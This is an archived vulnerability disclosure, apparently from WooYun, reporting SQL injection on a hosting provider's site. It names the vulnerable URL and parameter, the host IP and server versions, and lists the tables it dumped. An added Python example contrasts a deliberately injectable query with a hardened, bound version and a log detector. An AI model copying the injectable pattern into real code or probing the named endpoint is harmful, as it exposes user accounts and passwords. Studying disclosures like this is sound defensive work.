WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops article online reader -------- http://drop.zone.ci/
2013-01-25: Details sent to the vendor, awaiting vendor handling
2013-01-28: Vendor confirmed; details disclosed to the vendor only
2013-02-07: Details disclosed to core white hats and experts in the relevant field
2013-02-17: Details disclosed to regular white hats
2013-02-27: Details disclosed to intern white hats
2013-03-11: Details disclosed to the public
Huaxia Mingwang (华夏名网) main site SQL injection
http://www.sudu.cn/webhosting/cp/f10_sqltools_done.php?action=getsqlused&did=483710
All of the main site's information is in there, including member accounts and passwords, reseller accounts and passwords, virtual hosts, VPS, domain names and so on. There was a small twist along the way: the site has filtering, but it can be bypassed and the injection continued.
Target: http://www.sudu.cn/webhosting/cp/f10_sqltools_done.php
Host IP: 125.64.24.31
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e DAV/2 PHP/5.3.17
Powered-by: PHP/5.3.17
DB Server: MySQL >=5
Current DB: bigwwwcom
vserver vhosttransferQueue vhost userinfo user......... domain2_deleted_bak domain2_deleted domain2 dnslist dnshost datauser config cdnset cdnlistView cdnlist cdn2domain cdn2 alipay_dut_log adminPrivilege admin WebossUsage WebossTry WebSubsites WebSiteUnusualLog WebHostingEvent WebHostingCustom WebHostingAlterTrace WebHostingAlter VpsHostInfo VhostAppList VhostAppInstallInfo VServerIP VServerBinding UserTrack UserProductsGroup UserOperateLog UserDigVhost UserDigKeyword UserDigHistory UserDigEmuser UserDig UrlBlackList ......... Server SeoHistory SendMailPlan SDKValidate SDKUser SDKTemplate SDKIpayTotal RewriteRule PushTracking ProductTryTrace ProductGroup Points PackageSetting Package PServerInfo OldUserPlan OldUserList NotifyRead Notify MoveVhostTrack MoveIpTrack MoveCdnTrack MigrateHost MailTemplate MachineRoom KeywordsBlack IpUseData IDcard ICPinfo HypervVpsData HypervHostList HostResourcesUsedData HostInfo .......DomainPrice DomainBeianNew DomainBeianCheck DomainBeianCancel DnsOurs CouponPresentsGroup CouponPresentsClass CouponPresentsBrand CouponPresents CouponCaipiao Coupon ContactInfo CheckURL CashVoucherUsed CashVoucher BankAccounts BackupTablesConf AppInstallInfo AppInfo AliasType AliasMap AgentInfo AdminServiceApply AccessTracking
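The report describes an integer id (`did`) that reaches the database unparsed, protected only by a keyword filter that was bypassed. The following is an added example, not code from the report or from sudu.cn: it shows the injectable pattern next to a hardened handler that allow-lists the parameter's shape and binds it, plus a log-side check that flags requests whose `did` is not a plain decimal id. An in-memory SQLite table named after the `userinfo` table in the dump stands in for MySQL; its column names and rows are constructed for this example.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the report's database: an in-memory SQLite table named like the
# "userinfo" table in the dump; the column names and rows are assumptions made for this example.
SAMPLE_ROWS = [
    (483710, "user-a", "pwhash-a"),
    (483711, "user-b", "pwhash-b"),
    (483712, "user-c", "pwhash-c"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (did INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def get_sql_used_vulnerable(conn, did):
    """The pattern that makes a 'did' GET parameter injectable: the raw request value is
    concatenated into the SQL text, so whatever the client sends becomes part of the query."""
    sql = "SELECT did, username FROM userinfo WHERE did = " + did
    return conn.execute(sql).fetchall()


# An id is a bounded decimal integer; anything else is rejected before it reaches SQL.
DID_PATTERN = re.compile(r"[0-9]{1,10}")


def get_sql_used_hardened(conn, did):
    """Allow-list the parameter's shape, then bind it as a query parameter. This replaces the
    keyword blacklist the report mentions rather than supplementing it: shape validation plus
    binding stays correct without maintaining a list of forbidden words."""
    if not DID_PATTERN.fullmatch(did):
        raise ValueError("did must be a decimal id")
    sql = "SELECT did, username FROM userinfo WHERE did = ?"
    return conn.execute(sql, (int(did),)).fetchall()


def flag_request(url):
    """Detection side: given a request URL as it would appear in an access log, return True
    when a 'did' parameter is present but is not a plain decimal id."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return any(not DID_PATTERN.fullmatch(v) for v in params.get("did", []))


if __name__ == "__main__":
    db = make_db()
    print(get_sql_used_hardened(db, "483710"))
    print(flag_request("http://www.sudu.cn/webhosting/cp/f10_sqltools_done.php?action=getsqlused&did=483710"))
```

With the vulnerable handler, a `did` value that is not a number is passed to the database unchanged and alters the query; with the hardened handler the same value raises before any SQL runs, and `flag_request` would mark the corresponding access-log entry for review.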
There are quite a lot of users. A self-assessed rank of 20 isn't excessive, is it?
You have professional staff.
Severity: High
Vulnerability Rank: 20
Confirmation time: 2013-01-28 15:01
The technical team has been notified to patch it; this is a fairly major vulnerability
2013-12-26: Fixed